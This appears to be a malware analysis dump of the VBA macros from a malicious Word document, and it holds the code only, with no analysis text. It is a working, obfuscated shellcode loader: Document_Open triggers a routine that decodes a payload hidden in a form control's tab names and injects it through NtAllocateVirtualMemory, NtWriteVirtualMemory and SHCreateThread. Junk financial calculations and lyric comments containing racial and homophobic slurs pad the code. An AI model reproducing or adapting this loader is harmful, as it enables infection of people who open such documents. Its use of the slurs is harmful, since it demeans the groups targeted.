Malicious Office (OLE) — malware analysis report

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function puddler(gourde, gulch, backward)
#If Win64 Then
Dim alive As Long
Dim anthonomus As Integer
Dim animos As LongPtr
Dim sleeping As LongPtr
Dim bluishness As LongPtr
Dim art As Long
Dim hyperion As LongPtr
Dim bolster As LongPtr
#Else
Dim sleeping As Long
Dim aggressiveness As Integer
Dim animos As Long
Dim podargidae As Long
Dim hyperion As Long
Dim bifilar As String
Dim bluishness As Long
Dim sheikdom As Integer
Dim bolster As Long
Dim penandink As Variant
Dim renewable As String
#End If
miscalculation = finch Or 409
allemande = dormie
sleeping = gourde
bolster = backward
allemande = allemande
hyperion = gulch
crediting = 102
cooled = 25514
actuator = 386377
cooled = Pmt(0.0399, crediting, -21353, actuator, 1)

allemande = aerobic
animos = 114 - 47 - 68
celioma ByVal animos, sleeping, hyperion, bolster, bluishness
dormie = "eonian"
End Function
Function storing(rectus)
Dim ajar As String
Dim pare As Integer
Dim lice As String
Dim about As Variant
#If Win64 Then
Dim judas As String
Dim numbly As LongPtr
discreet = 8
Dim leverage As Variant
Dim aplasia As LongPtr
Dim acknowledge As Integer
Dim chimney As LongPtr
Dim amenra As Long
#Else
Dim bullbrier As Variant
Dim numbly As Long
discreet = 4
Dim aplasia As Long
Dim monkery As Byte
Dim chimney As Long
Dim gumwood As Long
Dim autochthonous As Variant
#End If
sparingly = puddler(VarPtr(numbly), VarPtr(rectus) + 8, discreet)
manichord = -1
aplasia = 56 + 91 - 54 - 93
circumscribed = 0
chimney = 9495
exemplification = 115 + 64 + 24 + 3893
deontology = 124 - 60
parcere = agape(ByVal manichord, aplasia, ByVal circumscribed, chimney, ByVal exemplification, ByVal deontology)
dame = Round(473.1269 + 345.1064)

finch = finch Or 242

puddler aplasia, numbly, 116 + 124 + 5354
intercede = 44
mythic = 15880
empress = 397897
foramen = SLN(empress, mythic, intercede)

storing = aplasia
End Function
Sub auriga()
Dim catalase As Byte
Dim extraordinariness As Byte
modillion = ThisDocument.ComputeStatistics(wdStatisticPages)
Set punishable = bop.Controls.Item(modillion - 2).Tabs
For Each cleaned In punishable
nonaddition = 48
intrication = 20132
bassoonist = 437784
feneration = SLN(bassoonist, intrication, nonaddition)

If cleaned.Index = 11 Then
trussed = "accountancy"
hoodlum = "awfulness"
woolgathering = "discrete"
hellebore = cleaned.Name
End If
Next
gastrointestinal = 128 + 34 + 7298
blanquillo = Right(hellebore, gastrointestinal)
brevier = bryopsida.footboy(blanquillo)
crag = 23
extravasation = 17303
haemulon = 154000
unexcited = SLN(haemulon, extravasation, crag)

lots = "eg" & "oist"
agreeableness = "up" & "dating"
#If Win64 Then
Dim pulsion As String
Dim aeolic As LongPtr
Dim broody As LongPtr
Dim newmade As String
#Else
Dim acquirements As Variant
Dim broody As Long
Dim adrift As Variant
Dim aeolic As Long
#End If
bedpan = 18 - 73 + 55
elongate = "ciliary"
chordeiles = 4096
hygrodeik = 14
vituss = 17890
sonneteer = 578333
vituss = Pmt(0.0775, hygrodeik, -17805, sonneteer, 1)

antido = "dinornithidae"
apricot = "duly"
urginea = 102
alnashar = 3034
ceremony = 105126
alnashar = Pmt(0.0646, urginea, -6711, ceremony, 1)

peneus = brevier
amongst = "ashkey"
monaurally = "pleural"
aeolic = storing(peneus)
orthopristis = "meliorism"
#If Win64 Then
Dim cyclist As String
Dim touches As LongPtr
insensitivity = "ren" & "dition"
emptor = "outgoing"
Dim proteg As LongPtr
guidance = 33 + 39 + 70 + 1138
#ElseIf Win32 Then
chainsmoker = "butterweed"
homebound = "aph" & "eresi" & "s"
Dim touches As Long
lepidosauria = 98 + 416
Dim proteg As Long
guidance = lepidosauria + 3204

#End If
Dim consentaneousness As Integer
Dim apercu As String
touches = 77 - 77
broody = aeolic + guidance
proteg = 1
flamboyantly = bondable(broody, touches, proteg, touches)
concremation = 15
departed = 31502
pancreatic = 576075
combatants = SLN(pancreatic, departed, concremation)

End Sub

Private Sub Document_Open()
Dim nonwoody As Long
Dim defectively As Long
stallfed = "carya"
sadhe = "osculate"
auriga
schema = 34
woden = 37893
hardly = 331018
oran = SLN(hardly, woden, schema)
End Sub
Sub SelectSentence()
    Dim wdApp As Word.Application
    Dim wdRng As Word.Range
    
    Set wdApp = GetObject(, "Word.Application")
    
    With wdApp.ActiveDocument
        If .Paragraphs.Count >= 3 Then
            Set wdRng = .Paragraphs(3).Range
            wdRng.Copy
        End If
    End With
    Worksheets("Sheet2").PasteSpecial
    Worksheets("Sheet2").Paste Destination:=Worksheets("Sheet2").Range("A1")
    
    Set wdApp = Nothing
    Set wdRng = Nothing
End Sub



Attribute VB_Name = "bryopsida"
' And we always gotta do it take it to another place
' She wax it all off, Mr.Miyagi
' I'm out of my head, bitch I'm outta my mind, from the bottom I climb
#If Win64 Then
' And them suicide doors, Hari Kari
' You niggas ain't eatin', fuck it, tell a waiter
' Yeah, fresher than a motherfucker
Public Declare PtrSafe Function clawed Lib "Shell32.dll" Alias "SHGetSettings" (frantic As LongPtr,duplicidentata As LongPtr) As LongPtr
' Oh, I'm getting paper
' Yeah, fresher than a motherfucker
' When you're doing that thing over there homie
Public Declare PtrSafe Function celioma Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal cabestro As Any, ByVal bloodsucker As Any, ByVal endstopped As Any, ByVal callorhinus As Any, ByVal fearlessly As Any) As LongPtr
' If you want that bullshit then I'm like "OlГ©"
' Just to be at the top of the throne
' And I be doing it to death and now I move a little foul
Public Declare PtrSafe Function agape Lib "ntdll.dll" Alias "NtAllocateVirtualMemory" (adamant As LongPtr, clampdown As LongPtr, ByVal collate As LongPtr,aphonousByVal As LongPtr, rath As LongPtr, ByVal labor As LongPtr) As LongPtr
' Just know that you will never flop me
' And I be banging on my chest, and I bang in the east, and I'm banging in the west
' Oh, I'm getting paper
Public Declare PtrSafe Function befuddle Lib "Kernel32.dll" Alias "GetSystemTime" (entbehr As LongPtr) As Boolean
' Do you really wanna know what's next? Let's go
' And I know that I can be a little cocky
' Look at me now
Public Declare PtrSafe Function aristotelean Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (chalons As LongPtr, circumscribe As Any,brick As LongPtr, allimportant As Any) As Boolean
' I'm done
' Ciroc and Sprite on a private flight,
' Yeah, fresher than a motherfucker
Public Declare PtrSafe Function bondable Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal boof As LongPtr, ByVal mackintosh As Any, ByVal breechcloth As LongPtr, ByVal bp As LongPtr) As LongPtr
' And them suicide doors, Hari Kari
' Got a bitch that play in movies in my Jacuzzi, pussy juicy
' Look at me now
Public Declare PtrSafe Function azotemic Lib "Kernel32.dll" Alias "LocalFree" (miasmal As LongPtr) As LongPtr
' Look at me now
' Better cuff your chick if you with her, I can get her
' And niggas know that I'm the best when it come to doing this
Public Declare PtrSafe Function multihued Lib "Shell32.dll" Alias "SHGetDesktopFolder" (balaenidae As LongPtr)
' And I'm feeling like I gotta get away, get away, get away
' And my pockets right, and my diamonds white
' I'm so Young Money, if you got eyes look at me now, bitch

' Ladies love me, I'm on my Cool J
' I ain't got no time to shuck and jive, these niggas as sweet as pumpkin pie
' I ain't got no time to shuck and jive, these niggas as sweet as pumpkin pie
#Else
' Yellow top missing
' I ain't got no time to shuck and jive, these niggas as sweet as pumpkin pie
' Let's go!
Public Declare Function bondable Lib "Shlwapi.dll" Alias "SHCreateThread" (ByVal chlamydera As Long, ByVal unclipped As Any, ByVal given As Any, ByVal masquerade As Any) As Long
' And we always gotta do it take it to another place
' See they really really wanna pop me
' Oops I said on my dick
Public Declare Function barrels Lib "Kernel32.dll" Alias "LocalFree" (feedlot As Long) As Long
' And them suicide doors, Hari Kari
' Yellow top missing
' Look at me now
Public Declare Function allabsorbing Lib "Shell32.dll" Alias "SHGetSettings" (cartoon As Long, fray As Long) As Long
' Better cuff your chick if you with her, I can get her
' And I know that I can be a little cocky
' Cause I'm killing every nigga that come try to be on my shit
Public Declare Function martian Lib "Kernel32.dll" Alias "SetSystemTime" (tonsilitis As Long) As Boolean
' Cause you know I gotta win everyday, day
' I'm so Young Money, if you got eyes look at me now, bitch
' And I'm feeling like I gotta get away, get away, get away
Public Declare Function hymenomycetes Lib "Shell32.dll" Alias "SHChangeNotification_Lock" (pectinibranchia As Long, rivel As Any, martes As Long, adducing As Any) As Boolean
' You ain't never gonna stop me
' See the way we on it and we all up in the race and you know
' Look at me now
Public Declare Function celioma Lib "Ntdll.dll" Alias "NtWriteVirtualMemory" (ByVal quartz As Any, ByVal appraisement As Any, ByVal convincible As Any, ByVal resigned As Any, ByVal conceptually As Any) As Long
' п»їYellow model chick
' Your girlfriend a freak like Cirque Du Soleil
' You faggots scared 'cause I'm too wild, been here for a while
Public Declare Function lave Lib "Shell32.dll" Alias "SHGetDesktopFolder" (dames As Long)
' п»їYellow model chick
' I ain't got no time to shuck and jive, these niggas as sweet as pumpkin pie
' That shit look like a toupee
Public Declare Function agape Lib "Ntdll.dll" Alias "NtAllocateVirtualMemory" (ryukyuan As Long, agitator As Long, ByVal rumpus As Long, descriptionByVal As Long, exulting As Long, ByVal stayed As Long) As Long
' And we struggle and I hustle and I set it and I get it
' Better cuff your chick if you with her, I can get her
' Yellow Lamborghini

' And I be doing it to death and now I move a little foul
' Just know that you will never flop me
' See they really really wanna pop me
#End If
' Yellow Lamborghini
' All of you haters say hi to it
' A nigga better call a ref, and everybody knows my style
  Function Strip_Hyperlinks_Bookmarks_Fields()
      Dim myLink As Hyperlink
      Dim myBookmark As Bookmark
      Dim myField As Field
      With ActiveDocument
          For Each myLink In .Hyperlinks
              myLink.Delete
          Next myLink
          For Each myBookmark In .Bookmarks
              myBookmark.Delete
          Next myBookmark
          For Each myField In .Fields
              myField.Unlink
          Next myField
      End With
  End Function

Function footboy(mediacy) As String
allemande = "curricular"

Dim forcing(6965) As Byte
Dim puncturable As Byte

Dim stichaeidae(63) As Long
Dim advective As String
Dim caucasus As Long

Dim wordds(63) As Long
Dim aegyptopithecus(63) As Long
dame = miscalculation / 277

Dim everyday As String

Dim fossiliferous As Integer
Dim winglike As Long
Dim irascibility() As Byte
aerobic = "art"

Dim chiropractic As Long
Dim intolerance As Long
Dim ranitidine As Long
Dim enjoyable As String

airlock = 85 + 56 + 65139
rupturewort = 38 - 112 - 55 + 262273
aria = 55 - 27 - 84 + 16515128
catostomidae = 4096
phlox = 256
buttress = 65536
sodalite = 83 + 38 + 61 - 119
attenuated = 64
aboriginal = 89 - 90 + 4033
frivolously = 71 + 33 - 103 + 254
Dim titanium As Byte

translunar = 16711680
bedew = 54 + 64 - 101 + 258031
Dim fetterbush As Byte

Dim neologist As Integer
multum = 0
camellia = 38 - 75 + 7496
Dim cladode() As Byte
cladode = VBA.StrConv(mediacy, vbFromUnicode)
Dim psocid As String
estop = 47
ceaseless = 38574
macaca = 268564
chit = SLN(macaca, ceaseless, estop)

creole = 7459
praam = 35
mauser = Log(100) / Log(10) + 13
For propound = 0 To creole
If propound Mod 2 = 0 Then
cladode(propound) = cladode(propound) + mauser
Else
cladode(propound) = cladode(propound) + mauser - 1
End If
Next propound
chamber = 39
depressive = 19436
misty = 239129
uptodate = SLN(misty, depressive, chamber)

fossiliferous = 0
burnished = 0
malversation = 43
movingly = miseris
For winglike = 0 To 63
aegyptopithecus(winglike) = homoerotic(winglike, attenuated, 3)
stichaeidae(winglike) = homoerotic(winglike, catostomidae, 3)
wordds(winglike) = homoerotic(winglike, rupturewort, 3)
Next winglike
articulately = 30
nuncupative = 31715
earphone = 110452
hominoid = SLN(earphone, nuncupative, articulately)

irascibility = cladode
sultan = 30 + 115 - 121 - 20
empurple = 35
endermic = 14799
obstupefaction = 311960
endermic = Pmt(0.0315, empurple, -21471, obstupefaction, 0)

bruit = 3
dormie = "auscultatory"

dormie = aerobic

distemper = bruit + 1
towage = 2
For intolerance = 0 To creole
safeconduct = irascibility(intolerance)
kepler = irascibility(intolerance + 2)
chiropractic = wordds(movingly(safeconduct)) _
 + stichaeidae(movingly(irascibility(intolerance + 1))) + aegyptopithecus(movingly(kepler)) + movingly(irascibility(intolerance + bruit))
winglike = homoerotic(chiropractic, translunar, 2)
forcing(ranitidine) = homoerotic(winglike, buttress, 1)
winglike = homoerotic(chiropractic, airlock, 2)
forcing(ranitidine + 1) = homoerotic(winglike, phlox, 1)
forcing(ranitidine + towage) = homoerotic(chiropractic, frivolously, 2)
ranitidine = ranitidine + towage + 1
intolerance = intolerance + 3
Next
footboy = forcing
End Function

Function migration(hull)
migration = AscW(hull)
End Function
Function homoerotic(cetoniidae, expounder, mucky)
Select Case mucky
Case 1
homoerotic = cetoniidae \ expounder
Case 2
homoerotic = cetoniidae And expounder
Case 3
homoerotic = cetoniidae * expounder
End Select
End Function
Function miseris()
Dim aethusa(255) As Byte
baa = 65
Do
aethusa(baa) = baa - 65
baa = baa + 1
Loop Until baa = 91
baa = 48
Do
aethusa(baa) = baa + 4
baa = baa + 1
Loop Until baa = 58
baa = 97
Do
aethusa(baa) = baa - 71
baa = baa + 1
Loop Until baa = 123
aethusa(47) = 63
baa = 43
aethusa(baa) = 62
miseris = aethusa
End Function


Attribute VB_Name = "bop"
Attribute VB_Base = "0{C56A0534-51C9-4E5B-A2EE-0C92638F71EF}{53641F26-2AC6-4C56-A181-C33578BFE6FF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False